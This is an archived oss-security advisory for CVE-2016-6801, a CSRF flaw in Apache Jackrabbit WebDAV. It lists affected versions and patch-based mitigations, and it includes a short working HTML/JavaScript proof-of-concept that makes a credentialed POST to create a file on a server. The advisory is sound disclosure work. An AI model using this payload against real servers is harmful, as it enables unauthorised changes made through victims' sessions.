Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 14 Sep 2016 14:34:22 +0200
From: Julian Reschke <reschke@...che.org>
To: Lukas Reschke <lukas@...tuscode.ch>,
 Jackrabbit Users <users@...krabbit.apache.org>,
 "dev@...krabbit.apache.org" <dev@...krabbit.apache.org>,
 "security@...che.org" <security@...che.org>,
 oss-security@...ts.openwall.com, bugtraq@...urityfocus.com
Subject: CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Apache Jackrabbit 2.4.5
Apache Jackrabbit 2.6.5
Apache Jackrabbit 2.8.2
Apache Jackrabbit 2.10.3
Apache Jackrabbit 2.12.3
Apache Jackrabbit 2.13.2

Description:
The CSRF content-type check for POST requests does not handle missing 
Content-Type header fields, nor variations in field values with respect 
to upper/lower case or optional parameters. This can be exploited to 
create a resource via CSRF.

Mitigation:
2.4.x users upgrade to 2.4.5 and apply the patch in 
http://svn.apache.org/r1758791 and/or upgrade to 2.4.6 once released
2.6.x users upgrade to 2.6.5 and apply the patch in 
http://svn.apache.org/r1758771 and/or upgrade to 2.6.6 once released
2.8.x users upgrade to 2.8.2 and apply the patch in 
http://svn.apache.org/r1758764 and/or upgrade to 2.8.3 once released
2.10.x users should upgrade to 2.10.4
2.12.x users should upgrade to 2.12.4
2.13.x users should upgrade to 2.13.3

Example:
A resource can be created like so:
<html>
   <body>
     <script>
       function submitRequest()
       {
         var xhr = new XMLHttpRequest();
         xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
         xhr.withCredentials = true;
         var body = "This file has been uploaded via CSRF.=\r\n";
         var aBody = new Uint8Array(body.length);
         for (var i = 0; i < aBody.length; i++)
           aBody[i] = body.charCodeAt(i);
         xhr.send(new Blob([aBody]));
       }
     </script>
     <form action="#">
       <input type="button" value="Submit request" 
onclick="submitRequest();" />
     </form>
   </body>
</html>

Credit:
This issue was discovered by Lukas Reschke.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ